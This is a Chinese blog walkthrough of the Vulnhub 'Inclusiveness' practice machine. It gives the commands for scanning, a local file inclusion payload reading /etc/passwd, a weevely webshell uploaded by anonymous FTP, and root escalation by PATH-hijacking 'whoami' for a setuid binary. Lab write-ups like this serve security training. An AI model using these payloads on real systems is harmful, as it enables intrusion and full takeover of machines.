vulhub inclusiveness

最新推荐文章于 2024-02-07 09:44:59 发布
最新推荐文章于 2024-02-07 09:44:59 发布
阅读量205 收藏
点赞数
分类专栏: VULHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/105775782
版权

知识点

FTP webshell写入
环境变量写入【popen()的使用】

主机发现

 netdiscover

在这里插入图片描述

端口扫描

nmap -A -T5 192.168.80.39 -oA nmap/nmap

在这里插入图片描述

WEB

  • 信息收集
gobuster dir -u http://192.168.80.39 -w /usr/share/wordlists/dirb/big.txt -t50 -q

在这里插入图片描述
访问站点

192.168.80.39/robots.txt

提示说不是搜索引擎在这里插入图片描述
更改User-Agent获取信息
在这里插入图片描述

  • 文件包含漏洞
http://192.168.80.39/secret_information/?lang=../../../../../etc/passwd

在这里插入图片描述

  • 获取FTP写入文件保存位置
http://192.168.80.39/secret_information/?lang=../../../../../etc/vsftpd.conf

在这里插入图片描述

  • FTP写入文件
**生成webshell**
weevely generate 123 sh.php
**写入webshell**
ftp 192.168.80.39
cd pub
put sh.php

获取shell

weevely http://192.168.80.39/secret_information/\?lang\=/var/ftp/pub/sh.php 123

在这里插入图片描述

提权

在这里插入图片描述

cat /home/tom/rootshell.c

在这里插入图片描述
通过代码可以知道,通过popen执行whoami命令来判断当前用户
由于popen()会继承环境变量,所以添加环境变量即可

cd /tmp
echo "printf "tom"" > whoami
chmod +x whoami
export PATH=/tmp:$PATH
cd /home/tom
./rootshell

在这里插入图片描述
END
在这里插入图片描述

hee_mee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Smart Business Intelligence Solutions with Microsoft SQL Server
10-10
inclusiveness—we have provided content targeted at both beginning and intermediate BI developers. We have also included information for business decision makers who wish to understand the ...
09 06cet4 AB卷答案
06-20
A卷 快速阅读: 1-7:1321431 8、very embarrasd 9、inclusiveness 10、differences and similarities
PG::Inclusiveness
aya3t的博客
11-25 286
PROVING GROUNDS::Inclusiveness
【甄选靶场】Vulnhub百个项目渗透——项目五十三:Inclusiveness(更改ua,lfi->rce)
人间体佐菲的博客
01-18 632
【甄选靶场】Vulnhub百个项目渗透——项目五十三:Inclusiveness(更改ua,lfi->rce)
vulnhub inclusiveness: 1
箭雨镜屋
07-16 1071
nmap扫描 ---- 绕过非搜索引擎(User-Agent头)过滤读取robots.txt ---- 利用LFI和ftp匿名上传文件getshell ---- C语言代码审计提权
林浩然与杨凌芸的Java奇缘:抽象类、接口与多态的编程三部曲
howard2005的专栏
02-07 919
在代码王国里,住着两位程序员明星——林浩然和杨凌芸。他们不仅是项目组里的核心力量,更是Java语言运用的大师级人物。他们的故事就像Java中的抽象类、接口与多态一样,充满智慧与变通。
facebook的官僚主义报道掩盖了滥用的失败
weixin_26717401的博客
09-13 44
“In other words, there’s too much toxic content for Facebook to ever really see it all (hello, scale) so Facebook has a formula for determining the amount based on random sampling. Abstractly, perhaps...
分割评价指标
fanre的专栏
12-30 4538
一、背景知识 True positives (TP):实际正样本,被预测成正样本。 True negatives (TN):实际负样本,被预测成负样本。 False positives (FP):实际正样本,被预测成正样本。 False negatives (FN):实际负样本,被预测成负样本。 实际上在分割中的TP、TN、FP、FN的具体含义见图1, 图1、分割中TP、TN、FP、FN的区域定义 Confusion Matrix:可以简单的理解为统计TP、TN、FP、FN的表.
Effective Regression Test Case Selection: A Systematic Literature Review
04-11 388
摘要 本文研究了2007至2015年间47篇实证研究。其中39%的研究采用挖掘和基于学习的回归测试用例选择,18%关于单元级别的测试,26%使用面向对象的环境。只有39%的研究可以根据实验步骤进行复现。 这些报告使用了7种不同的开销指标,13种覆盖类型和5种错误检测指标。70%的研究使用开销作为有效性的度量,31%使用故障检测能力作为度量,16%使用覆盖率作为度量。 1. 绪论 IEEE定义回归测...
软件开发:研究保险软件系统数据一致性和整体性.pdf
09-07
Insurance software system architecture design should be holistic, with strong expandability, extensibility, connectivity and inclusiveness. 6. 数据仓库和标准化接口:统一数据仓库和标准化接口是解决...
现在,发现你的优势——一场优势的革命.pdf
11-21
* 包容(Inclusiveness):扩大圈子,喜欢团队活动,认为人的本质是相同的,从而避免排外团体。 8. 如何控制弱点: * 把事情做好点。 * 设计一个支持系统。 * 用你的优势主题来盖过你的弱点。 * 找一个伙伴。 ...
分布式电网动态电压恢复器模拟装置设计与实现.doc
最新发布
07-06
本装置采用DC-AC及AC-DC-AC双重结构,前级采用功率因数校正(PFC)电路完成AC-DC变换,改善输入端电网电能质量。后级采用单相全桥逆变加变压器输出的拓扑结构,输出功率50W。整个系统以TI公司的浮点数字信号控制器TMS320F28335为控制电路核心,采用规则采样法和DSP片内ePWM模块功能实现SPWM波,采用DSP片内12位A/D对各模拟信号进行采集检测,简化了系统设计和成本。本装置具有良好的数字显示功能,采用CPLD自行设计驱动的4.3英寸彩色液晶TFT-LCD非常直观地完成了输出信号波形、频谱特性的在线实时显示,以及输入电压、电流、功率,输出电压、电流、功率,效率,频率,相位差,失真度参数的正确显示。本装置具有开机自检、输入电压欠压及输出过流保护,在过流、欠压故障排除后能自动恢复。
【无人机通信】基于matlab Stackelberg算法无人机边缘计算抗干扰信道分配【含Matlab源码 4957期】.mp4
07-06
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
电网公司数字化转型规划与实践两个文件.pptx
07-05
电网公司数字化转型规划与实践两个文件.pptx
React Native Ruby 前后端分离系统案例介绍文档
07-06
React Native Ruby 前后端分离系统案例介绍文档
http请求方法.docx
07-06
HTTP(Hypertext Transfer Protocol)定义了一些常见的请求方法(也称为动词或谓词),用于指示对服务器执行的操作类型。以下是常见的 HTTP 请求方法: GET:从服务器获取资源。GET 方法的请求参数一般附在 URL 后面,通过问号传参形式传递。 POST:向服务器提交数据,常用于提交表单或上传文件等操作。POST 方法的请求参数一般包含在请求体中。 PUT:向服务器发送数据,用来创建或更新资源。通常用于更新整个资源,但不限于此。 DELETE:请求服务器删除指定的资源。 HEAD:类似于 GET 方法,但服务器只返回响应头部,不返回实际内容。主要用于获取资源的元信息。 PATCH:部分更新资源,用来对资源进行局部修改。 OPTIONS:获取目标资源所支持的通信选项,常用于跨域请求的预检。 TRACE:回显服务器收到的请求,主要用于测试或诊断。 CONNECT:HTTP/1.1 协议中预留给能够将连接改为管道方式的代理服务器。 这些方法定义了客户端与服务器之间的交互方式,每种方法都有特定的语义和使用场景。在实际开发中,选择合适的方法非常重
ROS的一些基本概念和语法介绍 ROS提供了丰富的工具和库,用于构建复杂的机器人应用.docx
07-06
ROS的一些基本概念和语法介绍。ROS提供了丰富的工具和库,用于构建复杂的机器人应用.docx
利达余压调试软件说明书
07-05
利达余压调试软件说明书,介绍利达旗下品牌的余压系统调试软件的使用方法
AZ-140-117题5.31.pdf
06-27
The high coverage and inclusiveness of the Microsoft AZ-140 exam questions make it an ideal test for individuals looking to validate their skills and knowledge in Azure administration. The exam ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值